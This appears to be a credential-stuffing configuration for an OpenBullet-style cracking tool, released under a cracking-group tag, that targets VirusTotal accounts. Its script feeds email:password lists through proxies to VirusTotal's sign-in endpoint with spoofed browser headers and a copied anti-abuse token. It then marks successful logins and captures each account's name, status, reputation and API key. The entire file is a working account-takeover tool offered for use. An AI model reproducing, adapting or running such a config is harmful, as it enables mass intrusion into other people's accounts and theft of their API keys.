[SETTINGS]
{
  "Name": "VirusTotal.com [@CrackerzHub]",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-02-23T18:53:20.7168866+05:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "- DoMiNiC -",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "VirusTotal",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#UA FUNCTION GetRandomUA -> VAR "UA" 

#REQ[LOGIN] REQUEST POST "https://www.virustotal.com/ui/signin" 
  CONTENT "{\"data\":{\"user_id\":\"<USER>\",\"password\":\"<PASS>\",\"forever\":false}}" 
  CONTENTTYPE "application/json" 
  HEADER "authority: www.virustotal.com" 
  HEADER "accept: application/json" 
  HEADER "accept-ianguage: en-US,en;q=0.9,es;q=0.8" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-type: application/json" 
  HEADER "origin: https://www.virustotal.com" 
  HEADER "referer: https://www.virustotal.com/" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: <UA>" 
  HEADER "x-kl-ajax-request: Ajax_Request" 
  HEADER "x-tool: vt-ui-main" 
  HEADER "x-vt-anti-abuse-header: MTc3MDQzNTc3MTYtWkc5dWRDQmlaU0JsZG1scy0xNjQ1NjIyNTMzLjU3Mw==" 

#Chk_1 KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect user or password" 
  KEYCHAIN Success OR 
    KEY "apikey" 

#Status PARSE "<SOURCE>" LR "status\": \"" "\"" CreateEmpty=FALSE -> CAP "Status" 

#Name PARSE "<SOURCE>" LR "first_name\": \"" "\"" CreateEmpty=FALSE -> CAP "Name" 

#API_KEY PARSE "<SOURCE>" LR "apikey\": \"" "\"" CreateEmpty=FALSE -> CAP "API KEY" 

#Reps PARSE "<SOURCE>" LR "reputation\": " "}" CreateEmpty=FALSE -> CAP "Reps" 

#Credits FUNCTION Constant "@XxDoMiNiCxX 🔥" -> CAP "Config By" 

